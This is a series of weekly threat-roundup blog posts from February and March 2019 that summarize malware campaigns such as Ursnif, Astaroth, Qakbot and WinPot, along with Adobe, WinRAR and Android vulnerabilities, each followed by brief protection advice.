Threats of the Week – March 18, 2019

Threats of the Week – March 18, 2019

Ursnif banking Trojan

 

 

A new variant of an infamous banking Trojan malware with a history going back over ten years has emerged with new tactics to ensure it’s harder to detect.The malware aims to hunt out financial information, usernames, passwords and other sensitive data.

The Ursnif banking Trojan is one of the most popular forms of information-stealing malware targeting Windows PCs and it has existed in one form or another since at least 2007, when the its code first emerged in the Gozi banking Trojan.

Now researchers at security company Cybereason have uncovered a new, previously undocumented version of Ursnif which applies different, stealthier infection tactics than other campaigns.

This includes what researchers refer to as “last minute persistence” – a means of installing the malicious payload which tries to ensure a lower chance of being uncovered.

Source: ZDNet

How do you protect yourself?

Proper security measures must be in place to defend against Ursnif banking Trojan and similar threats. Having proper up-to-date endpoint and firewall security provides a cross-generational blend of threat defense techniques to protect systems from malware.

 

CVE-2019-7095

 

 

Adobe has released a security update for Adobe Digital Editions.  This update resolves a critical vulnerability.  Successful exploitation could lead to Arbitrary Code Execution in the context of the current user. Affected versions are 4.5.10.185749 and below.

Source: Adobe

How do you protect yourself?

Update Adobe Digital Editions to version 4.5.10.186048.

 

GlitchPOS Malware

 

 

A new insidious malware bent on siphoning credit-card numbers from point-of-sale (PoS) systems has recently been spotted on a crimeware forum.

Researchers at Cisco Talos said in a Wednesday analysis that they discovered the malware, dubbed “GlitchPOS,” being peddled on the Dark Web for $250. The malware first appeared on Feb. 2, and researchers said they don’t know yet how many cybercriminals bought it or are using it.

The malware is spread via email, purporting to be a game involving “various pictures of cats.”

Source: ThreatPost

How do you protect yourself?

Proper security measures must be in place to defend against GlitchPOS Malware and similar threats. Backing up your data and having proper up-to-date endpoint security provides a cross-generational blend of threat defense techniques to protect systems from malware.

Threats of the Week – March 11, 2019

Threats of the Week – March 11, 2019

StealthWorker Malware

 

 

Hackers are running a new campaign which drops the StealthWorker brute-force malware on Windows and Linux machines that end up being used to brute force other computers in a series of distributed brute force attacks.

As later discovered, the malware is capable of exploiting a number of vulnerabilities in to infiltrate Magento, phpMyAdmin, and cPanel Content Management Systems (CMSs), as well as brute force its way in if everything else fails.

While previously the StealthWorker payload was observed while being dropped on targeted servers with the help of the double-packed WallyShack Trojan downloader, the new campaign switched to a brute force-only approach aiming for any vulnerable host with weak or default credentials.

Source: BleepingComputer

How do you protect yourself?

Proper security measures must be in place to defend against StealthWorker malware and similar threats. Having proper up-to-date endpoint and firewall security provides a cross-generational blend of threat defense techniques to protect systems from malware.

 

CVE-2019-7816

 

 

Adobe has released security updates for ColdFusion versions 2018, 2016 and 11. These updates resolve a critical vulnerability that could lead to arbitrary code execution in the context of the running ColdFusion service.

Adobe is aware of a report that CVE-2019-7816 has been exploited in the wild.

Source: Adobe

How do you protect yourself?

Adobe recommends customers apply the security configuration settings as outlined on the ColdFusion Security page as well as review the respective Lockdown guides.

 

CryptoMix Ransomware

 

 

A new CryptoMix Ransomware variant has been discovered that appends the .CLOP or .CIOP extension to encrypted files. Of particular interest, is that this variant is now indicating that the attackers are targeting entire networks rather than individual computers.

This variant is currently being distributed using executables that have been code-signed with a digital signature. Doing so makes the executable appear more legitimate and may help to bypass security software detections.

Source: BleepingComputer

How do you protect yourself?

Proper security measures must be in place to defend against CryptoMix Ransomware and similar threats. Backing up your data and having proper up-to-date endpoint security provides a cross-generational blend of threat defense techniques to protect systems from malware.

Threats of the Week – March 4, 2019

Threats of the Week – March 4, 2019

Farseer Malware

 

 

A new brand of malware has been developed to give a threat group the tools required to attack Windows operating systems alongside their usual Android targets.

On Tuesday, cybersecurity researchers from Palo Alto’s Unit 42 said the malware, dubbed Farseer, has connections to HenBox, a cyberespionage malware detected in 2018 in attacks against Google’s Android operating system.

HenBox primarily targets the Turkish Uyghur group in order to steal data including personal and device information, including any phone numbers with a Chinese prefix. The malware is also able to compromise smartphone cameras and microphones.

Generally focused on smartphones, the hackers have now expanded their horizons with the launch of Farseer. The malware is spread through phishing campaigns and malicious .PDF files which employ social engineering tactics through the copy-and-paste of news articles sourced through a Myanmar website.

Source: ZDNet

How do you protect yourself?

Proper security measures must be in place to defend against Farseer malware and similar threats. Having proper up-to-date endpoint and firewall security provides a cross-generational blend of threat defense techniques to protect systems from malware.

 

CVE-2018-20250

 

 

A critical 19-year-old WinRAR vulnerability disclosed last week has now been spotted actively being exploited in a spam campaign spreading malware.

The campaign, discovered by researchers with 360 Threat Intelligence Center, takes advantage of a path-traversal WinRAR vulnerability, which could allow bad actors to remotely execute malicious code on victims’ machines simply by persuading them to open a file.

Source: ThreatPost

How do you protect yourself?

Researchers urge WinRAR users to update as soon as possible to the newest version of the software, 5.70 beta 1.

 

B0r0nt0K Ransomware

 

 

A new ransomware called B0r0nt0K is encrypting victim’s web sites and demanding a 20 bitcoin, or approximately $75,000, ransom. This ransomware is known to infect Linux servers, but may also be able to encrypt users running Windows.

In a BleepingComputer forum post, a user stated that a client’s web site was encrypted with the new B0r0nt0K Ransomware. This encrypted web site was running on Ubuntu 16.04 and had all of its files encrypted, renamed, and had the .rontok extension appended to them.

Source: BleepingComputer

How do you protect yourself?

Proper security measures must be in place to defend against B0r0nt0K Ransomware and similar threats. Having proper up-to-date endpoint security provides a cross-generational blend of threat defense techniques to protect systems from malware.

Threats of the Week – February 25, 2019

Threats of the Week – February 25, 2019

Rietspoof Malware

 

 

Rietspoof is a new malware family which uses a multi-stage delivery system, is designed to drop multiple payloads on the systems it infects, and offers very little to no information on what audience it targets.

What’s known at the moment is that the malware uses multiple stages to compromise its targets, each of them having very particular capabilities, with one acting as a bot that “can download/upload files, start processes, or initiate a self-destruct function,” and another behaving like a run-of-the-mill downloader.

At this moment, Rietspoof’s end goal, targets, and exact infection chain are not yet known, but something is obvious: the threat actors behind this malware are accelerating its development and deployment speed, adding new features and updating/improving the ones already in each day.

Source: BleepingComputer

How do you protect yourself?

Proper security measures must be in place to defend against Rietspoof malware and similar threats. Having proper up-to-date endpoint and firewall security provides a cross-generational blend of threat defense techniques to protect systems from malware.

 

CVE-2019-7815

 

 

Adobe has released security updates for Adobe Acrobat and Reader for Windows and macOS. These updates address a reported bypass to the fix for CVE-2019-7089 first introduced in 2019.010.20091, 2017.011.30120 and 2015.006.30475 and released on February 12, 2019. Successful exploitation could lead to sensitive information disclosure in the context of the current user.

Affected Versions

Product Track Affected Versions Platform
Acrobat DC Continuous 2019.010.20091 and earlier versions Windows and macOS
Acrobat Reader DC Continuous 2019.010.20091 and earlier versions Windows and macOS
Acrobat 2017 Classic 2017 2017.011.30120 and earlier version Windows
Acrobat Reader 2017 Classic 2017 2017.011.30120 and earlier version Windows
Acrobat DC Classic 2015 2015.006.30475 and earlier versions Windows
Acrobat Reader DC Classic 2015 2015.006.30475 and earlier versions Windows

Source: Adobe

How do you protect yourself?

Upgrade Adobe Acrobat and Reader to the latest version.

 

WinPot malware

 

 

The WinPot ATM jackpotting malware is evolving, as its authors look to solve the obstacles that get in their way. The latest is an effort to help ATM hackers, a.k.a. jackpotters, better target their efforts in order to steal more cash in a lesser amount of time.

Thieves infect ATMs through physical access, i.e., by using USB drives to install malware onto the machine (ATM owners can thus protect themselves through device control and software blacklisting/whitelisting). The USB port is located on the back of the ATM, which the criminals get to by popping open a flange on the front that exposes a hole.

Once the malware is installed, the cybercriminals can force the ATM to dispense cash on-demand via a software interface that appears on the ATM’s screen. The effect is a bit like hitting the jackpot on a slot machine, hence the nickname for this kind of strike.

Source: ThreatPost

How do you protect yourself?

Proper security measures must be in place to defend against WinPot Malware and similar threats. Having proper up-to-date endpoint security provides a cross-generational blend of threat defense techniques to protect systems from malware.

Threats of the Week – February 19, 2019

Threats of the Week – February 19, 2019

Clipper Malware

 

 

A malicious app designed to steal cryptocurrency from victims by replacing a wallet address in the phone’s clipboard has been discovered harboring the first “clipper” malware discovered on Google Play, the official Android app store.

Usually cryptocurrency-stealers are found on unsanctioned Android app stores, but researchers with ESET on Friday said that they spotted the malicious app (a fake version of the legitimate MetaMask service) shortly after it had been introduced at the official Android store on Feb. 1. The app has since been removed, but anyone who had already downloaded it remains affected.

Source: ThreatPost

How do you protect yourself?

Proper security measures must be in place to defend against Clipper malware and similar threats. Having proper up-to-date endpoint and firewall security provides a cross-generational blend of threat defense techniques to protect systems from malware.

 

CVE-2019-7090

 

 

Adobe has released security updates for Adobe Flash Player for Windows, macOS, Linux and Chrome OS. These updates address one important vulnerability in Adobe Flash Player. Successful exploitation could lead to information disclosure in the context of the current user.

Source: Adobe

How do you protect yourself?

Adobe categorizes these updates with the following priority ratings and recommends users update their installation to the latest version:

Product Version Platform Priority Availability
Adobe Flash Player Desktop Runtime 32.0.0.142 Windows, macOS 2 Flash Player Download Center

Flash Player Distribution

Adobe Flash Player for Google Chrome 32.0.0.142 Windows, macOS, Linux, and Chrome OS 2 Google Chrome Releases
Adobe Flash Player for Microsoft Edge and Internet Explorer 11 32.0.0.144 Windows 10 and 8.1 2 Microsoft Security Advisory
Adobe Flash Player Desktop Runtime 32.0.0.142 Linux 3 Flash Player Download Center

 

Astaroth Trojan

 

 

A new Astaroth Trojan campaign targeting Brazil and European countries is currently exploiting the Avast antivirus and security software developed by GAS Tecnologia to steal information and load malicious modules.

According to Cybereason’s Nocturnus team which discovered the new Astaroth strain, just like previous installments, the malware uses “legitimate, built-in Windows OS processes to perform malicious activities and deliver a payload without being detected” but it also makes use “of well-known tools and even antivirus software to expand its capabilities.”

This Astaroth variant is distributed through spam campaigns just like previous versions, and the infection starts with a .7zip archive delivered to the target in the form of an e-mail message attachment or hyperlink. The malicious archive contains a .lnk file which will spawn a wmic.exe process that will “initialize an XSL Script Processing attack.”

Next, the malware connects to a command-and-control (C2) server and exfiltrates information about the infected computer. After downloading the encrypted XSL script to the infected machine, the Trojan will use BITSAdmin to grab a payload from another C2 server, carefully obfuscated as images or files without extensions containing various Astaroth modules.

Source: BleepingComputer

How do you protect yourself?

Proper security measures must be in place to defend against Astaroth Trojan and similar threats. Having proper up-to-date endpoint security provides a cross-generational blend of threat defense techniques to protect systems from malware.

Threats of the Week – February 11, 2019

Threats of the Week – February 11, 2019

Qakbot Malware

 

 

Cofense observed the botnets delivering non-Geodo malware since at least Jan. 28 via increasingly targeted phishing efforts. The attack begins when a user receives a phishing email containing a weaponized Microsoft Office document. That file contains malicious embedded macros that, when enabled, directly deliver Qakbot malware to the victim’s device. Researchers also witnessed the campaign leveraging IcedID, another banking Trojan, as its final payload.

In both cases, the campaign ends by replacing the binary content with that of calc.exe. This tactic is designed to help the campaign hide in plain sight, which signals Geodo’s evolution as a digital threat. Cofense found additional evidence of this evolution in Geodo’s use of targeted addressing, internal signatures and previous threads to prey on state-level government departments in the U.S. as part of a related malware campaign.

Source: Security Intelligence

How do you protect yourself?

Proper security measures must be in place to defend against Qakbot malware and similar threats. Having proper up-to-date endpoint and firewall security provides a cross-generational blend of threat defense techniques to protect systems from malware.

 

CVE-2019-1986

 

 

Google has released a security bulletin detailing several patched vulnerabilities. The most severe of these issues is a critical security vulnerability in Framework that could allow a remote attacker using a specially crafted PNG file to execute arbitrary code within the context of a privileged process.

Source: Android

How do you protect yourself?

Update your android OS to the latest version.

 

SpeakUp Backdoor Trojan

 

 

A malware campaign distributing a new Backdoor Trojan named SpeakUp is currently targeting servers running six different Linux distributions and macOS by exploiting a number of known security vulnerabilities, while also managing to evade all anti-malware solutions in the process.

Backdoor Trojans are malware capable of providing attackers with access to compromised machines and to help them control those infected computers using commands sent via command-and-control (C&C) servers.

Source: BleepingComputer

How do you protect yourself?

Proper security measures must be in place to defend against SpeakUp Backdoor Trojan and similar threats. Having proper up-to-date endpoint security provides a cross-generational blend of threat defense techniques to protect systems from malware.